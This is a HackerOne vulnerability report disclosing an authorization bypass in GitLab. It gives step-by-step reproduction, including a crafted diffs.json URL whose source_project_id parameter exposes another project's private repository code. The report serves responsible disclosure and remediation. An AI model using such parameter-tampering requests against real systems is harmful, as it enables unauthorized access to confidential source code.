Source Code Disclosure of Private Repo in Public/Internal Project
HackerOne report #455673 by ngalog on 2018-12-05:
Summary:
One of the very unique feature of Gitlab is that it allows you to adjust the permission of each separate part of your project. Consider this setting, a public project with a private repo.
Like in this screenshot
Owner of project could be secretly developing something in the repo part and but want to keep the rest of the project public.
However, there is a way to bypass this protection, and still allow non-project member to view the source code of repo.
Steps To Reproduce (Quick):
- Login and visit here to confirm you can't see the repo -- project id is
9769102
- Visit one of the project you own and visit
https://gitlab.com/{project_name_space}/merge_requests/new/diffs.json
, if you can see{"html":"\u003cdiv class=\"nothing-here-block\"\u003e\nThis merge request cannot be created.\n\u003c/div\u003e\n"}
in response, please proceed, if not, please create at least one file in that project - Then add this in the query part of the url
?utf8=%E2%9C%93&merge_request%5Bsource_project_id%5D=9769102&merge_request%5Bsource_branch%5D=master&merge_request%5Btarget_project_id%5D=124124124&merge_request%5Btarget_branch%5D=master
- Now you are looking at the source code for my private repo in project
9769102
Slow way to reproduce:
- Create a project with config like this
- create some file inside
- login as other user, and visit
https://gitlab.com/{project_namespace_that_you_own}/merge_requests/new/diffs.json?utf8=%E2%9C%93&merge_request[source_project_id]={victim_project_id}&merge_request[source_branch]=master&merge_request[target_project_id]=1294819248&merge_request[target_branch]=master
- Source code disclosure!
Impact
source code disclosure for private repo in public project
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
Edited by Dennis Appelt